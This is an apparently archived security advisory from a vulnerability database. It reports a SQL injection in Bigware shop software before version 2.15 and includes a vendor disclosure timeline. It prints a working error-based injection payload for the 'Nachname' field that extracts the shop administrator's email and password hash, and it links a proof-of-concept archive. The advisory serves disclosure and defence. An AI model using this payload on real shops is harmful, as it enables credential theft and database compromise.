Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:27664
HistoryFeb 13, 2012 - 12:00 a.m.

SQL injection in Bigware shop software

2012-02-1300:00:00
vulners.com
17
JSON

The Bigware shop software prior to version 2.15 contains a SQL injection, resulting in full database compromise. The injection point is the POST parameter 'lastname' in the module main_bigware_43.php. A user must be created before exploitation.

Proof of concept is at http://files.dw-itsecurity.de/43.zip

Do it manually: Create a valid user at www.shopsite.com/main_bigware_10.php. Open www.shopsite.com/main_bigware_43.php and add the following statement in the field 'Nachname':

' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT former_email_address
FROM former where former_groups_id like 1 LIMIT 0,1), CHAR(58), (SELECT
former_password FROM former where former_groups_id like 1 LIMIT 0,1),
FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND '1' LIKE '1

The error message contains username and hashed password of the shop administrator.

Time line:
12/10/2011: Vendor contacted
12/10/2011: Vendor response
12/18/2011: Vendor patch release
12/19/2011: Vendor requested time to notify customers
01/23/2012: Disclosure

See also: http://www.dw-itsecurity.de/index.php/unser-service/websicherheit/bigware

JSON